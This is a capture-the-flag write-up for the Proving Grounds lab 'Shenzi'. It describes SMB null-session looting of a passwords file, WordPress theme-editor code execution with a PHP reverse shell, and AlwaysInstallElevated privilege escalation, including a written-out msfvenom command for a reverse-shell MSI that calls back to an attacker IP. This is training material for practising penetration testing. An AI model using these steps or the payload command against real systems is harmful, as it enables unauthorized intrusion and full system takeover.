Shenzi - Proving Grounds Practice
Enumeration
Nmap
Initial nmap scan revealed FTP, SMB and HTTP ports were open.
SMB Enumeration
SMB Null session was allowed and I could access Shenzi share.
It included suspicious files such as passwords.txt.
This file included different application’s administrator passwords.
I then applied RID Brute Forcing and found that username is shenzi.
Exploitation
Wordpress Theme Editor (404.php)
At first I tried directory brute force and many other things but non of them worked. Later, I thought the user’s name is shenzi, share name is shenzi maybe there would be an endpoint named shenzi and indeed there was.
It was a wordpress website and I simply logged in using found credentials from passwords.txt file before.
I then used ivan-sincek/php-reverse-shell to update 404.php under theme editor. And changed IP value to my local IP.
And I got the user shell.
I then simply read the user flag.
Privilege Escalation
AlwaysInstallElevated
The AlwaysInstallElevated check identifies a Windows Group Policy misconfiguration that allows standard users to install MSI packages with SYSTEM-level privileges. This setting, when enabled in both HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER, allows any user to execute arbitrary code with elevated privileges by creating a malicious MSI installer.
For more information: https://docs.specterops.io/ghostpack-docs/SharpUp-mdx/checks/alwaysinstallelevated
At first I executed WinPEAS.exe and PowerUp.ps1 and both showed that AlwaysInstallElevated was enabled.
As seen in second image, I tried Write-UserAddMsi but it did not work. Later, I created a malicious msi file with msfvenom.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.210 LPORT=4444 -f msi -o malicious.msi
Then I transfered it and executed it on the target machine.
And I simply obtained SYSTEM shell and read administrator flag.